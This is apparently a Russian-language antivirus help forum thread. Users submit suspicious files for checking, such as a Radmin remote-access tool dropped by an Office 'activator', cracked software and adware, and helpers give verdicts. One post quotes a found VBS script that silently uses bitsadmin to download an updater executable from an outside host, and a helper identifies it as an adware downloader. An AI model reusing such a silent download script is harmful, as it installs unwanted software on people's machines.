-
[QUOTE]C:\Program Files (x86)\Opera\launcher.exe - чистый.
C:\Program Files\Intel\TXE Components\TCS\HeciServer.exe - чистый
C:\Program Files\WindowsApps\Microsoft.SkypeApp_3.1.0.1007_x86__kzf8qxf38zg5c\LibWrap.dll - чистый
C:\windows\SYSTEM32\sysfiles\msimg32.dll - чистый
C:\windows\SYSTEM32\sysfiles\oledlg.dll - чистый
C:\windows\syswow64\sysfiles\rfusclient.exe, C:\windows\syswow64\sysfiles\rutserv.exe - not-a-virus:RemoteAdmin.Win32.Agent.lq (от программы удаленного доступа Radmin)[/QUOTE]
[COLOR="#FFFFFF"]...[/COLOR]
-
[QUOTE=mike 1;1266333][COLOR="#FFFFFF"]...[/COLOR][/QUOTE]
Вот эти файлы C:\windows\syswow64\sysfiles\rfusclient.exe, C:\windows\syswow64\sysfiles\rutserv.exe появились после установки "активатора офиса"
Просто удалить наверное мало?
-
[quote="Userik;1266334"]Вот эти файлы C:\windows\syswow64\sysfiles\rfusclient.exe, C:\windows\syswow64\sysfiles\rutserv.exe появились после установки "активатора офиса"[/quote]
значит, кто-то теперь имеет удалённый доступ к вашей системе.
[quote="Userik;1266334"]Просто удалить наверное мало?[/quote][url]http://virusinfo.info/showthread.php?t=1235[/url]
-
Файл сохранён как 150515_211536_virus_555629b8178d2.zip
Размер файла 4537931
MD5 f7b9ebb092e4d1ed46a31530a955f434
-
Файл сохранён как 150519_064934_virusinfo_auto_MIR_555aa4beaec7d.zip
Размер файла 60675520
MD5 b01ce9069272ae9d1809775af4f36760
-
[b]Userik[/b], для файлов типа
[quote="Userik;1273701"]150519_064934_virusinfo_auto_MIR_555aa4beaec7d.zip[/quote]
вот эта процедура [url]http://virusinfo.info/content.php?r=290-virus-detector[/url]
там же вы сами можете увидеть отчёт по файлам. Файлы в архиве чистые.
-
Вложений: 1
Здравствуйте!
Полезная прожка 10-Strike Connection Monitor Pro, но:
[ATTACH=CONFIG]567250[/ATTACH]
Ваш вердикт и советы, пожалуйста?
P.S. Да, да, крякнутая...
P.P.S. Ложное срабатывание ввиду особенностей работы этой программы?
-
Файл сохранён как 150809_224109_run_55c79ec58c0c5.zip
Размер файла 48498
MD5 550e5a49a13a21141443bcb6e05d9bfe
скажите пожалуйста, какой вред может нанести этот файл, и как этого избежать можно, при этом не удаляя сам файл? без него нельзя игру запустить:(
-
[QUOTE]Ваш вердикт и советы, пожалуйста?[/QUOTE]
А вы файл загружали?
[QUOTE]скажите пожалуйста, какой вред может нанести этот файл, и как этого избежать можно, при этом не удаляя сам файл? без него нельзя игру запустить[/QUOTE]
Это не вирус, но эта программа может выполнять скрытно другие файлы, например какой-нибудь батник.
-
[QUOTE=mike 1;1302993]А вы файл загружали?
Это не вирус, но эта программа может выполнять скрытно другие файлы, например какой-нибудь батник.[/QUOTE]
а как узнать о том, действует ли она скрытно или нет?
-
[QUOTE=cvsdfvgsd;1302998]а как узнать о том, действует ли она скрытно или нет?[/QUOTE]
Создайте свою тему с логами в разделе Помогите.
-
по идее, апдейтер для игры. скажите пожалуйста, есть ли там вирусы?
Файл сохранён как 150813_100928_virus_55cc349895dd9.zip
Размер файла 934131
MD5 a5ef5cfb560fe1a6ec14d4665a10d62a
-
Drweb нашёл файл C:/task.vbs
содержимое файла:
Set WshShell = CreateObject("WScript.Shell")
cmds=WshShell.RUN("bitsadmin /transfer amijob /download /priority high %TEMP%/Updater.exe",0, True)
Set WshShell = Nothing
Результаты проверки: [url]https://www.virustotal.com/ru/file/d49b462f9d405d5d0cd43fd45606a70a8dfc9d191e81b49798c4e83e1768cd5c/analysis/1440875485/[/url]
Это вирус?
-
[quote="MihailKrasnodar;1309178"]Drweb нашёл файл C:/task.vbs
содержимое файла:
Set WshShell = CreateObject("WScript.Shell")
cmds=WshShell.RUN("bitsadmin /transfer amijob /download /priority high //cds.d5v5w7m8.hwcdn.net/run/Updater.exe %TEMP%/Updater.exe",0, True)
Set WshShell = Nothing
Результаты проверки: [URL]https://www.virustotal.com/ru/file/d...is/1440875485/[/URL]
Это вирус?[/quote]
Не, не вирус... Сей скрипт всего лишь загружает ту фигню, что в Вашем посте зовется апдейтер.экзе.
А вот уже сам апдейтер - это вот что: [URL="https://www.virustotal.com/ru/file/34b14c6772794d78010a14110e614a678e4f5f517fd9702d44c0adc13db6c34b/analysis/1440906409/"]тык[/URL] - потенциально нежелательная программа, предназначенная для показа рекламы в браузерах, отображения модифицированных страниц, открытия доп. вкладок и т.п.
Поищите в папках для временных файлов этот апдейтер. Может уже загрузился...
P.S. Будьте добры, потрите ссылку на updater в тексте. Вдруг кто тыкнет случайно :)
-
Файл сохранён как 151009_183645_JLRPatch_EN_5617d0fdd6bbc.zip
Размер файла 2770339
MD5 ea281b8b6495fcfc666465ba1f241cd2
-
-
[quote="Adanedhel;1321070"]Файл сохранён как 151009_183645_JLRPatch_EN_5617d0fdd6bbc.zip
Размер файла 2770339
MD5 ea281b8b6495fcfc666465ba1f241cd2[/quote]
Зловред.
-
Файл сохранён как 151016_175501_virus_562101b56a283.zip
Размер файла 820669
MD5 06f1015d556beea817dce0fb636f9e7c
-
[QUOTE=xuim;1322987]Файл сохранён как 151016_175501_virus_562101b56a283.zip
Размер файла 820669
MD5 06f1015d556beea817dce0fb636f9e7c[/QUOTE]
Заражен. Рекламное ПО.
-
Файл сохранён как 151024_225557_virus_562bd43db5a7a.zip
Размер файла 731023
MD5 3faf4b6da9ab726661654266b09620f2
Page generated in 0.01057 seconds with 10 queries